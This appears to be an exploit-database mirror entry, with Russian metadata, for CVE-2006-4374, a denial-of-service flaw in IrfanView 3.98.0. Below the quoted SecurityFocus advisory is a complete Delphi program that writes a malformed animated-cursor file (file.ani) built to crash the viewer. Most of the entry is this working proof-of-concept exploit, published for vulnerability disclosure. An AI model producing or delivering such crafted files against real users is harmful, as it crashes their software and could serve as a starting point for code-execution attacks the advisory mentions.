- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 28369
- Проверка EDB
-
- Пройдено
- Автор
- SEHATO
- Тип уязвимости
- DOS
- Платформа
- WINDOWS
- CVE
- cve-2006-4374
- Дата публикации
- 2006-08-09
Код:
source: https://www.securityfocus.com/bid/19452/info
IrfanView is prone to a denial-of-service vulnerability.
A remote attacker may crash the application, resulting in denial-of-service conditions to legitimate users.
This issue may potentially be exploited to execute arbitrary machine code, but this has not been
confirmed.
Version 3.98.0 is vulnerable to this issue; other versions may also be affected.
program ani;
{$APPTYPE CONSOLE}
const
FileName='file.ani';
Len=113;
Buf=#$52#$49#$46#$46#$00#$00#$00#$00#$41#$43#$4F#$4E#$00#$00#$00#$00#$24#$00+
#$00#$00#$24#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00+
#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00+
#$4C#$49#$53#$54#$00#$00#$00#$00#$66#$72#$61#$6D#$69#$63#$6F#$6E#$00#$00#$00+
#$00#$00#$00#$00#$00#$01#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00#$02#$00+
#$16#$00#$00#$00#$28#$00#$00#$00#$FF#$FF#$FF#$00#$02#$00#$00#$00#$00#$00#$01;
var
F:File;
I:Byte;
begin
AssignFile(F,FileName);
Rewrite(F,1);
BlockWrite(F, Buf, Len);
CloseFile(F);
end.
- Источник
- www.exploit-db.com